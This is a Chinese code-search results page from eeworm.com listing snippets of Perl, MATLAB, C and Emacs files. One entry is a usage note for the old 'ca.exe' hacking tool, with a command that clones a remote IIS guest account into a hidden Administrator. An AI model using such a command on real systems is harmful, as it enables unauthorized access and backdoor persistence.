代码搜索:same

找到约 10,000 项符合「same」的源代码

代码结果 10,000
www.eeworm.com/read/285975/8798457

058_prob ch15.058_prob

############################################################################## ## Code fragment (NOT RECOMMENDED) from Chapter 15 of "Perl Best Practices" ## ## Copyright (c) O'Reilly & Associates
www.eeworm.com/read/283824/8986571

m alexample.m

clear; close all; im = imread('al.tiff','tif'); [ydim, xdim] = size(im); im = im(3:xdim-2, 3:ydim-2); imagesc(im); colormap gray; axis off; axis equal; prefilt = [0.223755 0.552490 0.223755];
www.eeworm.com/read/283824/8986574

m gaussian_filt.m

% makes zero-mean gaussian filter by taking sz samples from gaussian distribution % sz is a vector with dimensions of the filter sz = 5; x = -2:2; sigma = 1; % 1D gaussian g1 = exp(-x.^2/2);
www.eeworm.com/read/283824/8986754

m edgedetection.m

% Algorith 4.3 edge detection % Step-by-step euclidean reconstruction algorithm from multiple views % as described in Chapter 4, "An introduction to 3-D Vision" % by Y. Ma, S. Soatto, J. Kosecka,
www.eeworm.com/read/382802/8999637

txt 克隆admin!ca.exe使用方法.txt

利用SA.exe 将Iusr_victim克隆为Administrator。 C:\>ca \\192.168.0.1 test test iusr_victim password Clone Administrator, by netXeyes 2002/04/06 Written by netXeyes 2002, dansnow@21cn.com Connect 19
www.eeworm.com/read/382751/9003235

h opcodes.h

/* Automatically generated. Do not edit */ /* See the mkopcodeh.awk script for details */ #define OP_VNext 1 #define OP_Affinity 2 #define O
www.eeworm.com/read/178332/9407428

c gpifpio0.c

// // This program configures the General Purpose Interface (GPIF) for Fx2. // Parts of th
www.eeworm.com/read/178332/9407450

c gpifpio4.c

// // This program configures the General Purpose Interface (GPIF) for Fx2. // Parts of th
www.eeworm.com/read/278235/10555007

ms-kermit

;;; This file is designed for an 8-bit connection. ;;; Use the file ms-7bkermit if you have a 7-bit connection. ;; Meta key mappings for EMACS ;; By Robert Earl (rearl@watnxt3.ucr.edu) ;; May 13, 199
www.eeworm.com/read/278235/10555583

nt makefile.nt

# Hacked up Nmake makefile for GNU Emacs # Geoff Voelker (voelker@cs.washington.edu) # Copyright (c) 1994 Free Software Foundation, Inc. # # This file is part of GNU Emacs. # # GNU Emacs is fr